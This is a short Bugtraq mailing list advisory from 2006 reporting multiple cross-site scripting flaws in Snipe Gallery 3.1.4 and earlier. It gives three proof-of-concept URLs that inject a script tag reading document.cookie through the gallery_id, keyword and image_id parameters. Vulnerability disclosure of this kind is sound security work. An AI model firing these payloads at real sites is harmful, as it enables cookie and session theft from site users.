Bugtraq mailing list archives

Snipe Gallery <= 3.1.4 Multiple XSS

From: qex () bsdmail org
Date: 15 Apr 2006 15:00:19 -0000

Snipe Gallery <= 3.1.4 Multiple XSS

http://www.[SITE].com/[PATH]/view.php?gallery_id=&apos;><script>alert(document.cookie)</script>
http://www.[SITE].com/[PATH]/search.php?keyword=&apos;><script>alert(document.cookie)</script>&search_cat=&search_type=and
http://www.[SITE].com/[PATH]/image.php?page=1&gallery_id=980&image_id=&apos;><script>alert(document.cookie)</script>

Found By:
Qex

Current thread:

Snipe Gallery <= 3.1.4 Multiple XSS qex (Apr 15)
- <Possible follow-ups>
- Re: Snipe Gallery <= 3.1.4 Multiple XSS nobody (Apr 17)